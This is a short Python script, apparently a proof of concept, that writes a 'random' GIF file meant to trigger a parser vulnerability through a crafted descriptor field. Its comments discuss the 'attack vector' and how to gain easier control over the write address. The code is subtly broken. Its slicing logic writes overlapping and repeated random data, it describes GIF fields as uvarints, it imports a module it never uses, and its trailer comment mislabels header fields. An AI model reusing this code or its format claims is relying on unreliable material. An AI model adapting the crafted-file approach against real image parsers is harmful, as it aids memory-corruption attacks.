#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    header = b'GIF89a'
    datalen = int.from_bytes(
            rng.read(3), byteorder='big')
    data = rng.read(datalen)

    # Write the header and all bytes preceding the first descriptor
    print('Writing the header', end='', flush=True)
    out.write(header + data[:10])
    print(' done.', flush=True)

    # Now we're going to write 256 descriptors at once
    # Using this loop means we avoid making multiple calls to read()
    # which makes our test case more realistic.
    for i in range(256):
        if (i % 10 == 0):
            print('.', end='', flush=True)

        last_byte = data[10+i*7]

        # Make sure the old implementation doesn't handle
        # incomplete descriptors correctly. To do this simply
        # set one of the bytes in the graphic control extension
        # to 0xff to make it too long when parsed as a
        # uvarint. We do this because the attack vector is
        # controlling how much code is executed but not where
        # in memory it writes to. However since the length field
        # comes before the delay time field this makes the
        # attack harder than necessary (we don't need to have
        # control over that). If you want easy control over the
        # address you can change this to something like 0xfe or
        # even just add 1 to the delay time field instead of
        # doing this trick with the length field
        if last_byte == 0xf7:
            data += b'\x00'

        out.write(data[10+i*7:last_byte+14])
        out.write(data[last_byte:])
        print('done.', flush=True)

    # Finally add the trailer to finish off the output.
    # Normally this would be part of the application logic
    # when writing a gif but since this is intended only
    # for demonstration purposes we do it here directly.
    # See https://github.com/decompme/decompilation-guide/issues/46
    print('Adding the trailer and EOF', end='', flush=True)
    # 2 bytes for signature
    # 1 byte for version
    # 1 byte for flags
    # 2 bytes for background color index
    # 2 bytes for pixel aspect ratio
    out.write(b'\x3B\x00\x00\x00')
    print(' done', flush=True)

